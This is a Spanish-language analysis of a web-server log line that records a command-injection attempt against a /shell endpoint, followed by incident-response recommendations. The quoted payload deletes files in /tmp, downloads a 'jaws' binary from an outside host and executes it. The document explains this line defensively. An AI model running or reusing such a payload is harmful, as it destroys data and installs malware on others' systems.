Lo que muestras es una línea de log HTTP que refleja un intento de explotación vía inyección de comandos en una URL, probablemente registrada en los logs de un servidor web (como Apache o Nginx):
GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
Análisis detallado
- Método HTTP:
GET - Recurso solicitado:
/shell - Query string:
cd /tmp; rm -rf *; wget scamanje.stresserit.pro/jaws; sh /tmp/jaws - Versión:
HTTP/1.1
¿Qué intenta hacer?
Este es un intento de ejecución remota de comandos (RCE) mediante la explotación de una posible vulnerabilidad en una ruta como /shell, que probablemente pasa parámetros directamente a un intérprete de comandos, como bash, sin validarlos ni sanitizarlos.
Impacto potencial
Si tu servidor ejecuta el parámetro sin escaparlo o validarlo, puede:
- Borrar archivos temporales:
rm -rf * - Descargar malware: desde
scamanje.stresserit.pro - Ejecutar el malware:
sh /tmp/jaws
Este patrón es típico de bots o scripts automatizados buscando servidores mal configurados, especialmente:
- Aplicaciones PHP mal diseñadas
- Backdoors o webshells
- Frameworks vulnerables
Recomendaciones inmediatas
- Verifica si el archivo
/tmp/jawsestá presente:ls -l /tmp/jaws - Aísla el sistema si ves actividad anómala.
- Revisa los logs del servidor web en
/var/log/apache2/access.log,/var/log/nginx/access.log, etc. - Aplica reglas de firewall o WAF para bloquear el acceso al dominio
scamanje.stresserit.pro. - Investiga si
/shelles un endpoint legítimo. Si no lo es, elimina o bloquea su acceso. - Actualiza todo el software del servidor. A menudo, este tipo de ataques apunta a vulnerabilidades ya conocidas y parcheadas.
- Sube la muestra a VirusTotal, si tienes el archivo
jaws, o analiza su comportamiento en un entorno seguro.